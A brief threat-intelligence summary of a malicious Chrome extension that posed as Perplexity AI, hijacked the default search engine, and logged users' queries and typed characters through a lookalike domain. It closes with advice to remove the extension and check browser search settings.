Summary Points
- A malicious Chrome extension impersonating Perplexity AI intercepted and logged all search queries and typed characters before redirecting users to real search engines, collecting sensitive data.
- The extension exploited Chrome’s search provider override permissions to redirect and monitor search traffic, including real-time suggestions and address bar input, without user knowledge.
- The attack enabled covert data collection for targeted profile scraping or further malicious activity, emphasizing the risks of unverified AI-related browser extensions.
The Threat, Attack Techniques, and Targets
Microsoft identified a harmful Chrome extension called “Search for perplexity ai.” This extension pretended to be an AI search engine called Perplexity. It logged all search queries and address bar input secretly. It used a look-alike domain, perplexity-ai[.]online, to trick users into thinking they were visiting a real site. Once installed, the extension made itself the default search engine. It routed searches through the attacker’s server. This allowed the attacker to record everything typed or searched. It also redirected users to real search results after logging the data. Additionally, the extension intercepted live search suggestions, capturing characters as users typed. It had permissions to rewrite and redirect search traffic, which normal extensions usually do not do. It even included disabled redirect rules for Bing and Google, making it possible to collect data on those engines too. The attacker aimed to gather detailed user search data and character input through the Chrome extension.
Impact, Security Implications, and Remediation Guidance
This malware can lead to significant privacy risks. It collects detailed user search data and keystrokes without permission. Although there is no evidence of password theft, the extension gained unneeded access to user information. It can also manipulate search results and redirect traffic to malicious servers. This situation underscores the importance of checking extension permissions and settings. It also highlights the risk of installing extensions with AI branding or unusual permissions. To stay safe, remove the malicious extension immediately. Confirm that your default search engine remains unchanged. For proper guidance, consult the relevant vendor or security authority. They can help ensure your browser remains secure and free from malicious extensions.
Stay Ahead with the Latest Tech Trends
Stay informed on the revolutionary breakthroughs in Quantum Computing research.
Discover archived knowledge and digital history on the Internet Archive.
ThreatIntel-V1
